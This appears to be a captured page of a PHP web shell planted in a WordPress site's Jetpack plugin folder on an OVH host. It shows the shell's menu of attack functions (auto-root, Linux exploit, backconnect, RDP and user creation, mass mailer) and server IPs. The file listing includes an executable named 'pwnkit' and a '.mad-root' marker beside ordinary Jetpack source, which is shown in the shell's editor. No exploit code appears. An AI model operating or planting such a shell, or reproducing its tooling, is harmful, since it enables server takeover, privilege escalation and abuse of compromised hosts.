Linux webd002.cluster130.gra.hosting.ovh.net 6.18.39-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Tue Jul 21 12:03:15 CEST 2026 x86_64
Apache
: 10.130.40.2 | : 216.73.217.172
Cant Read [ /etc/named.conf ]
8.3.31
espacpq
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
espacpq /
www /
wp-content /
plugins /
jetpack /
src /
[ HOME SHELL ]
Name
Size
Permission
Action
abilities
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
class-deprecate.php
6.94
KB
-rw-r--r--
class-jetpack-crm-data.php
2.35
KB
-rw-r--r--
class-jetpack-modules-override...
3.59
KB
-rw-r--r--
class-jetpack-script-data.php
1.05
KB
-rw-r--r--
class-tracking.php
6.99
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : class-jetpack-script-data.php
<?php /** * Jetpack_Script_Data. * * Adds Jetpack-plugin-specific data to the consolidated JetpackScriptData object. * * @package automattic/jetpack */ namespace Automattic\Jetpack\Plugin; /** * Jetpack_Script_Data class. */ class Jetpack_Script_Data { /** * Configure script data. */ public static function configure() { add_filter( 'jetpack_admin_js_script_data', array( __CLASS__, 'set_admin_script_data' ), 10, 1 ); } /** * Add Jetpack-plugin-specific data to the consolidated JetpackScriptData object. * * @since 15.6 * * @param array $data The script data. * @return array */ public static function set_admin_script_data( $data ) { /** * Whether to show the Jetpack branding in editor panels (e.g., SEO, AI Assistant). * * @since 15.6 * * @param bool $show Whether to show the Jetpack editor panel branding. Defaults to true. */ $data['jetpack'] = array( 'flags' => array( 'showJetpackBranding' => (bool) apply_filters( 'jetpack_show_editor_panel_branding', true ), ), ); return $data; } }
Close